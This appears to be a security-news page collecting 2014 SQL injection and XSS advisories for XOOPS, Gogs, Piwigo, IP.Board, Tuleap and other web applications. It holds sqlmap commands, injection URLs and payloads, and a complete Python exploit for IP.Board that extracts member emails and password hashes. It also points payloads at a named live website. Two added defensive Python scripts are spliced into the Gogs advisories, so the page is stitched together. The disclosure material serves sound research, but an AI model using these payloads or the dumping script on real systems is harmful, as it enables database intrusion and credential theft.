MondoUnix

18 Nov 2014

XOOPS 2.5.6 SQL Injection

=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It is possible to inject SQL code through the variable "selgroups" on the
page "admin.php". This bug was found while using the portal with
authentication. To exploit the vulnerability it is only necessary to use
version 1.0 of the HTTP protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to suffer from
Blind SQL injection.
 
/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1" --cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p "selgroups" --technique=TB --dbs
 
[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind
(comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment)' injectable
 
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6
 
VII. SOLUTION
-------------------------
Update to version 2.5.7
 
VIII. REFERENCES
-------------------------
http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester


16 Nov 2014

Gogs Repository Search SQL Injection

Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in
Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can
create multiple repositories and share code with others with the git
version control system. Repositories can be marked as public or private
to prevent access from unauthorized users.
 
Gogs provides an API view to give JavaScript code the possibility to
search for existing repositories in the system. This view is accessible
at /api/v1/repos/search?q=<search query>.
 
The q parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique
======================
Remote
 
 
Severity Level
==============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err error) {
    // Prevent SQL inject.
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return repos, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    repos = make([]*Repository, 0, opt.Limit)
 
    // Append conditions.
    sess := x.Limit(opt.Limit)
    if opt.Uid > 0 {
        sess.Where("owner_id=?", opt.Uid)
    }
    if !opt.Private {
        sess.And("is_private=false")
    }
    sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
    return repos, err
}
[...]
 
The vulnerability exists because of a string concatenation in the SQL
query with user supplied data. Because of the SQL filter at the method
entry, attackers can't use spaces (0x20) and since v0.5.6.1025-g83283b
commas are also filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
 
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink":"bluec0re/root@localhost"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5] http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
 
 
Advisory-ID
===========
BC-1402
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor be held liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information.
 
 
 
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in
Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can
create multiple repositories and share code with others with the git
version control system. Repositories can be marked as public or private
to prevent access from unauthorized users.
 
Gogs provides an API view to give JavaScript code the possibility to
search for existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.
 
The q parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return us, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    us = make([]*User, 0, opt.Limit)
    err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" + opt.Keyword + "%'").Find(&us)
    return us, err
}
[...]
 
The vulnerability exists because of a string concatenation in the SQL
query with user supplied data. Because of the SQL filter at the method
entry, attackers can't use spaces (0x20) and since v0.5.6.1025-g83283b
commas are also filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'
 
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":"//1.gravatar.com/avatar/"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" + opt.Keyword + "%").Find(&us)
 
Update to version 0.5.6.1105.
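Both Gogs search fixes above (repository search and user search) replace a concatenated LIKE pattern with a bound parameter. The following Python script is an added example, not Gogs code: it reproduces the two query shapes against an in-memory SQLite table filled with constructed rows (the table name, its columns and the repository names are assumptions chosen to mirror the identifiers in the vulnerable code) and works as a regression test for the fix, showing that the concatenated form lets a keyword change the query and return private rows, while the parameterized form only ever compares the keyword as data.

```python
import sqlite3

# Constructed rows standing in for the Gogs repository table:
# (lower_name, owner_id, is_private). Table and column names are assumptions,
# chosen to mirror the identifiers in the vulnerable code section.
REPOS = [
    ("bluec0re/test", 1, 0),
    ("bluec0re/secret", 1, 1),
    ("alice/tooling", 2, 0),
]


def _connect():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE repository (lower_name TEXT, owner_id INTEGER, is_private INTEGER)"
    )
    conn.executemany("INSERT INTO repository VALUES (?, ?, ?)", REPOS)
    return conn


def search_concatenated(keyword, include_private=False):
    """The vulnerable shape: the keyword is spliced into the SQL text, so a quote
    inside it closes the literal and the rest of the keyword is parsed as SQL."""
    sql = "SELECT lower_name FROM repository WHERE 1=1"
    if not include_private:
        sql += " AND is_private=0"
    sql += " AND lower_name LIKE '%" + keyword.lower() + "%' ORDER BY lower_name"
    conn = _connect()
    try:
        return [row[0] for row in conn.execute(sql)]
    finally:
        conn.close()


def search_parameterized(keyword, include_private=False):
    """The advisory's fix: the whole pattern travels as a bound parameter, so the
    keyword is only ever compared as data and never parsed as SQL."""
    sql = "SELECT lower_name FROM repository WHERE 1=1"
    args = []
    if not include_private:
        sql += " AND is_private=0"
    sql += " AND lower_name LIKE ? ORDER BY lower_name"
    args.append("%" + keyword.lower() + "%")
    conn = _connect()
    try:
        return [row[0] for row in conn.execute(sql, args)]
    finally:
        conn.close()


def compare(keyword):
    """Run both shapes on one keyword. A syntax error in the concatenated shape is
    reported as the string 'SQL error' so the two results can sit side by side."""
    try:
        concatenated = search_concatenated(keyword)
    except sqlite3.OperationalError:
        concatenated = "SQL error"
    return {"concatenated": concatenated, "parameterized": search_parameterized(keyword)}


if __name__ == "__main__":
    # Three keywords: a normal one, one containing a quote, and one shaped like
    # the advisory's PoC that widens the WHERE clause in the concatenated form.
    for kw in ("test", "o'neil", "x' or is_private=1 or lower_name like '"):
        print(repr(kw), compare(kw))
```

With the third keyword the concatenated query returns every repository, including the private one that the `is_private=0` condition was meant to hide; the parameterized query returns nothing, because no repository name contains that text. A keyword with a single quote is a syntax error in the first shape and simply a non-matching keyword in the second.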
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5] http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
 
 
Advisory-ID
===========
BC-1403
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor be held liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information.
 
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================


15 Nov 2014

Gogs Label Search Blind SQL Injection

 
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in
Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can
create multiple repositories and share code with others with the git
version control system. Repositories can be marked as public or private
to prevent access from unauthorized users.
 
Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=
 
The labels parameter of this view is vulnerable to a blind SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8681
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds, sortType string) ([]Issue, error) {
    sess := x.Limit(20, (page-1)*20)
 
    if rid > 0 {
        sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
    } else {
        sess.Where("is_closed=?", isClosed)
    }
 
    if uid > 0 {
        sess.And("assignee_id=?", uid)
    } else if pid > 0 {
        sess.And("poster_id=?", pid)
    }
 
    if mid > 0 {
        sess.And("milestone_id=?", mid)
    }
 
    if len(labelIds) > 0 {
        for _, label := range strings.Split(labelIds, ",") {
            sess.And("label_ids like '%$" + label + "|%'")
        }
    }
[...]
 
The vulnerability exists because of a string concatenation in the SQL
query with user supplied data. An attacker is restricted to not use
commas in the injection string as the program splits input at commas.
 
 
Proof of Concept
================
Test whether the version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or char_length(@@version) > 10 and '|%'='&type=all&state=
 
Returns all issues if true, none if false.
 
This could be used to extract data with a binary search.
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("label_ids like ?", "%$" + label + "|%")
 
Update to Version 0.5.6.1025.
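The label filter fix above binds each `%$<id>|%` pattern instead of splicing the label into the query, and the timeline notes the vendor also fixed the issue by enforcing the data type of the input. The following Python script is an added example, not Gogs code: it validates the comma-separated label list as positive integers before any SQL is built, binds one LIKE per label, and runs the result against constructed issue rows that use the `$<id>|` list encoding implied by the advisory's pattern (the issue table, its columns and rows are assumptions).

```python
import sqlite3

# Constructed issue rows. label_ids uses the "$<id>|" list encoding implied by the
# advisory's LIKE pattern ('%$' + label + '|%'); the table itself is an assumption.
ISSUES = [
    (1, "login fails", "$1|$3|"),
    (2, "typo in docs", "$2|"),
    (3, "crash on start", "$1|"),
    (4, "wrong colour", "$10|"),
]


def _connect():
    """In-memory SQLite database seeded with the constructed issues."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE issue (id INTEGER, name TEXT, label_ids TEXT)")
    conn.executemany("INSERT INTO issue VALUES (?, ?, ?)", ISSUES)
    return conn


def parse_label_ids(label_ids):
    """Enforce the data type before anything touches SQL: every comma-separated
    label must be a positive integer. Rejecting the request here is what makes a
    quote or an 'or' in the value irrelevant to the query that follows."""
    if not label_ids:
        return []
    ids = []
    for part in label_ids.split(","):
        part = part.strip()
        if not part.isdigit() or int(part) <= 0:
            raise ValueError("label id must be a positive integer: %r" % part)
        ids.append(int(part))
    return ids


def is_valid_label_list(label_ids):
    """True if the labels parameter would be accepted by parse_label_ids."""
    try:
        parse_label_ids(label_ids)
        return True
    except ValueError:
        return False


def build_label_filter(label_ids):
    """Return (where_fragment, args): one bound LIKE per label, mirroring the
    sess.And("label_ids like ?", "%$" + label + "|%") fix. Only validated
    integers reach the pattern, and the pattern itself is a bound argument."""
    ids = parse_label_ids(label_ids)
    if not ids:
        return "1=1", []
    clauses = ["label_ids LIKE ?"] * len(ids)
    args = ["%%$%d|%%" % i for i in ids]
    return " AND ".join(clauses), args


def issues_with_labels(label_ids):
    """Ids of the issues carrying every label in label_ids (all issues when empty).
    The WHERE fragment concatenated here is built by build_label_filter from
    placeholders only; user input is carried exclusively in args."""
    where, args = build_label_filter(label_ids)
    conn = _connect()
    try:
        rows = conn.execute("SELECT id FROM issue WHERE " + where + " ORDER BY id", args)
        return [row[0] for row in rows]
    finally:
        conn.close()


if __name__ == "__main__":
    print(issues_with_labels("1"))     # [1, 3]: the '|' delimiter keeps label 10 apart
    print(issues_with_labels("1,3"))   # [1]
    print(is_valid_label_list("1,' or 1=1 and '"))  # False: rejected before any SQL
```

The `|` delimiter in the stored encoding is what makes `%$1|%` match label 1 but not label 10; without it the LIKE pattern would confuse the two. Validation happens before the query text exists, so a label value shaped like the advisory's proof of concept never reaches the database.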
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4] http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5] http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
 
 
Advisory-ID
===========
BC-1401
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor be held liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information.
 


14 Nov 2014

Piwigo <= v2.6.0 – Blind SQL Injection

=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised:  November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo <= v2.6.0
 
II. BACKGROUND
-------------------------
Piwigo is a web application for managing photo albums, available under the GPL license.
It is written in PHP and requires a MySQL, PostgreSQL or SQLite database.
 
III. DESCRIPTION
-------------------------
This bug was found while using the portal without authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.
It is possible to inject SQL code through the variable "rate" on the page "picture.php".
 
IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to suffer from Blind SQL injection.
 
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs
 
[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. 
Client systems can also be targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
Piwigo <= v2.6.0
 
VII. SOLUTION
-------------------------
All data received by the application that can be modified by the user must be validated before any kind of transaction is performed with it.
 
VIII. REFERENCES
-------------------------
http://www.piwigo.org
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
 
XI. DISCLOSURE TIMELINE
-------------------------
January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
November 12, 2014 2: Send to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester


11 Nov 2014

IP.Board 3.4.7 SQL Injection

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
 
url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
 
import sys, re
 
# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>
 
import urllib2, urllib
 
def inject(sql):
  try:
    urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
  except urllib2.HTTPError, e:
    if e.code == 503:
      data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
      txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
      if txt is not None: 
        return txt.group(1)
      sys.exit('Error [3], received unexpected data:\n%s' % data)
    sys.exit('Error [1]')
  sys.exit('Error [2]')
 
def get(name, table, num):
  sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  s = int(inject('LENGTH((%s))' % sqli))
  if s < 31:
    return inject(sqli)
  else:
    r = ''
    for i in range(1, s+1, 31):
      r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
    return r
 
n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):  
  print get('member_id', 'members', j)
  print get('name', 'members', j)
  print get('email', 'members', j)
  print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
  print '----------------'


29 Oct 2014

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability an attacker needs to be in a position to access the '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 


14 Oct 2014

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerable files: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thank's


3 Oct 2014

AllMyVisitors 0.5.0 SQL Injection

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vendor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when a web application accepts user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 
 
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, a large number of web applications are vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
 
Tests performed: 
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
